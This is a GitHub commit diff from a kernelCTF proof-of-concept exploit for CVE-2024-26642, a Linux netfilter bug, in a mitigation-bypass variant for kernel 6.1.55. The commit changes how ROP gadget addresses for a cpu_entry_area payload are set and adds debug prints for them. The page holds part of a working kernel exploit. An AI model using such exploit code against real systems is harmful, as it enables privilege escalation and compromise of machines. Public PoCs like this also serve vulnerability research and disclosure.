File tree 2 files changed +9
-3
lines changed
pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55
2 files changed +9
-3
lines changed Original file line number Diff line number Diff line change @@ -309,9 +309,15 @@ static void setup_cpu_entry_area(int64_t kernel_off) {
309309 }
310310
311311 struct cpu_entry_area_payload payload = {};
312- payload .nft_expr_eval = kernel_off + POP_RSP_JMP_RSI_0XF ;
313- payload .pop_rsp_jmp_rsi_0xf = kernel_off + POP_RSP_JMP_RSI_0XF ;
314- payload .nft_do_chain_leave = kernel_off + NFT_DO_CHAIN_LEAVE ;
312+ printf ("%llx\n" , push_rdi_jmp_rsi_0xf );
313+ printf ("%llx\n" , kernel_off + POP_RSP_JMP_RSI_0XF );
314+ printf ("%llx\n" , pop_rsp_jmp_rsi_0xf );
315+ printf ("%llx\n" , kernel_off + POP_RSP_JMP_RSI_0XF );
316+ printf ("%llx\n" , nft_do_chain_leave );
317+ printf ("%llx\n" , kernel_off + NFT_DO_CHAIN_LEAVE );
318+ payload .nft_expr_eval = push_rdi_jmp_rsi_0xf ;//kernel_off + POP_RSP_JMP_RSI_0XF;
319+ payload .pop_rsp_jmp_rsi_0xf = pop_rsp_jmp_rsi_0xf ;//kernel_off + POP_RSP_JMP_RSI_0XF;
320+ payload .nft_do_chain_leave = nft_do_chain_leave ;//kernel_off + NFT_DO_CHAIN_LEAVE;
315321
316322 PANIC_IF (_pin_to_cpu (HELPER_CPU ) < 0 );
317323 PANIC_IF (signal (SIGFPE , sig_handler ) == SIG_ERR );
You can’t perform that action at this time.
0 commit comments